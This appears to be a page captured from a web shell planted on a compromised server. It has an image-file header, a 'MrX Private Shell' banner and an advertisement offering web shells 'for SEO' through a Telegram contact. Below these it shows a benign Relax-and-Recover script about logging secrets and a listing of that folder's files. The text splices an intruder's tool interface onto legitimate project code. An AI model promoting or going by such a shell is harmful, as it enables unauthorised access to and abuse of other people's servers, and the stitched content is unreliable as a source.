����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
# To help with debugging dump all currently existing variable values into the log file.
#
# Because this will also output possibly confidential values into the log file
# (like passwords, encryption keys, authentication tokens, ...)
# this happens only if rear is run by the user with the 'expose-secrets' option
# see https://github.com/rear/rear/issues/2967
# 'declare -p' is a secret command so '$( declare -p )' is also a secret command
# because 'set -x' prints the result of $( declare -p ) as part of the LogSecret argument:
if { LogSecret "Runtime Configuration:$LF$( declare -p )" ; } 2>>/dev/$SECRET_OUTPUT_DEV ; then
# Show the log file name here in any case because sbin/rear shows "Using log file ..." only in verbose mode:
LogUserOutput "Dumped all variable values (including possibly confidential values) into $RUNTIME_LOGFILE"
else
Debug "Skipped dumping all variable values into the log file (use 'expose-secrets' for that)"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 001_verify_config_arrays.sh | File | 1.47 KB | 0644 |
|
| 002_check_rear_recover_mode.sh | File | 1.95 KB | 0644 |
|
| 010_EFISTUB_check.sh | File | 368 B | 0644 |
|
| 010_set_drlm_env.sh | File | 135 B | 0644 |
|
| 030_update_recovery_system.sh | File | 2.66 KB | 0644 |
|
| 100_check_stale_nfs_mounts.sh | File | 1.15 KB | 0644 |
|
| 950_check_missing_programs.sh | File | 1.93 KB | 0644 |
|
| 998_dump_variables.sh | File | 1.08 KB | 0644 |
|